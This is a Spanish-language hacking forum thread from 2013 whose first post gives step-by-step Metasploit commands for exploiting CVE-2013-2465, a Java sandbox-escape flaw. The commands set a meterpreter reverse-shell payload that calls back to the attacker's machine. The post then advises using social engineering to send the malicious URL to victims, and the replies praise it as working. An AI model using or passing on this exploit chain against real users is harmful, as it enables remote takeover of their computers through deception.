comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CVE-2013-2465

  • 6 Respuestas
  • 3145 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« en: Agosto 23, 2013, 01:57:06 am »

CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.


Explotando CVE-2013-2465 con mestasploit:

// Cargamos el módulo
Código: [Seleccionar]
msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/
« Última modificación: Agosto 23, 2013, 02:23:46 am por Stuxnet »

Desconectado Flemon

  • *
  • Underc0der
  • Mensajes: 235
  • Actividad:
    0%
  • Reputación 0
  • NO HAY FORMA DE DETENERME!!
    • Ver Perfil
    • Email
« Respuesta #1 en: Agosto 23, 2013, 06:46:25 am »
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?
No intentes pararme, trata de defenderte, trata de matarme, pero de cualqueir forma TE SUPERARE

Desconectado morodog

  • *
  • Underc0der
  • Mensajes: 350
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: MorodoG
  • Twitter: m4r4d4g
« Respuesta #2 en: Agosto 23, 2013, 07:59:18 am »
Habrá q probarlo! Gracias!!

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #3 en: Agosto 23, 2013, 09:23:05 am »
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?

Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.

Saludos...

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #4 en: Agosto 23, 2013, 11:04:09 am »
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?

Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.

Saludos...

Siempre traduces  xDDD

PD: Es totalmente funcional :)

Regards,
Snifer
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5406
  • Actividad:
    11.67%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Agosto 23, 2013, 11:57:49 am »
Nicee!!
Para el blog!

http://blog.underc0de.org/2013/08/cve-2013-2465-java-storeimagearray.html

Muchas gracias Stuxnet! muy buen aporte!


Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #6 en: Agosto 23, 2013, 04:59:21 pm »
@Snifer yo se que me amas; xD si tradusco la descripción mejor enséñame ingles xD

Saludos.

 

¿Te gustó el post? COMPARTILO!



[VIDEOTUTORIAL] Napstic – curso basico de ethical hacking (2013)

Iniciado por graphixx

Respuestas: 11
Vistas: 5796
Último mensaje Enero 19, 2017, 10:24:14 pm
por linkazama
CVE-2013-2460

Iniciado por Stuxnet

Respuestas: 0
Vistas: 3791
Último mensaje Julio 03, 2013, 12:25:45 pm
por Stuxnet